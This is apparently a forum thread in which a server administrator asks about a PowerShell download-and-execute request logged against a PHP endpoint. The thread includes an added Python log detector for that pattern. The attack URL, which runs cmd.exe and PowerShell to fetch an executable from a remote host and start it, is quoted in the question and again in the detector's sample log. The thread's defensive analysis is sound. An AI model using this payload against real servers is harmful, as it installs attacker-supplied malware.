trojan81
asked on
powershell exploit attempt
I've noticed that all of my web servers were logging this block below from my host intrusion prevention system. For privacy, assume this particular webserver has a dns name of zeus.xyzcorp.com
zeus.xyzcorp.com/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/8.exe');start%20C:/8.exe
Is this bot just a crafted URL request being thrown at my webserver in hopes that it is vulnerable to run a powershell script that will make it reach out and download + execute something? Which exploit would this be targeting?
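As an added example (not part of the original thread), here is a small Python detector that URL-decodes the request target in web server access-log lines and flags the cmd.exe / PowerShell WebClient download-and-run pattern quoted in the question; the log lines, IPs and timestamps are constructed, with the request from the question embedded as the first line.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache-style access-log lines. Line 1 carries the request from the
# question; line 2 is a benign request used as a negative control.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2019:03:14:07 +0000] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/8.exe');start%20C:/8.exe HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jun/2019:03:15:11 +0000] "GET /public/index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')

# Indicators are matched against the fully decoded query string, case-insensitively.
INDICATORS = {
    "cmd_exe": re.compile(r"cmd(?:\.exe)?\s+/c", re.I),
    "powershell": re.compile(r"powershell", re.I),
    "webclient_download": re.compile(r"new-object\s+system\.net\.webclient\)\s*\.downloadfile", re.I),
    "start_exec": re.compile(r"(?:^|;)\s*start\s+", re.I),
}
DOWNLOAD_ARGS = re.compile(r"downloadfile\(\s*'([^']+)'\s*,\s*'([^']+)'", re.I)

def decode_query(request_target):
    """Split the request target and decode its query repeatedly, so a
    double-encoded payload (%2520 for a space) is normalised as well."""
    parts = urlsplit(request_target)
    query = parts.query
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return parts.path, query

def analyse_request(request_target):
    """Return a finding dict for one request target; 'alert' is True only when
    an interpreter invocation AND a download primitive are both present."""
    path, query = decode_query(request_target)
    hits = [name for name, rx in INDICATORS.items() if rx.search(query)]
    args = DOWNLOAD_ARGS.search(query)
    finding = {"path": path, "indicators": hits,
               "remote_url": args.group(1) if args else None,   # where the payload is fetched from
               "drop_path": args.group(2) if args else None}    # where it would be written locally
    has_download = "webclient_download" in hits or args is not None
    has_shell = "cmd_exe" in hits or "powershell" in hits
    finding["alert"] = has_download and has_shell
    return finding

def scan_log(text):
    """Return findings for every log line whose decoded query looks like a download-and-execute attempt."""
    results = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            finding = analyse_request(m.group(1))
            if finding["alert"]:
                results.append(finding)
    return results
```

The extracted remote URL and drop path are the values worth blocking at the proxy and hunting for on hosts; a 404 in the log, as here, means the request never reached an interpreter.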
ASKER
Whatever it is doing, my webserver is not vulnerable so it didn't execute anything. I'm curious which vulnerability it is targeting.
Same 404 :)
ASKER
Jose/Qlemo,
Would you say that it is trying to invoke powershell to download and run the file?
Yes, but that would require running PHP code in hydra.php located in your web site's public folder. Maybe a reference to http://www.markus-lanthaler.com/hydra/, and the crafted (cheap) attack based on that API?
ASKER
public/hydra.php?xcmd=cmd.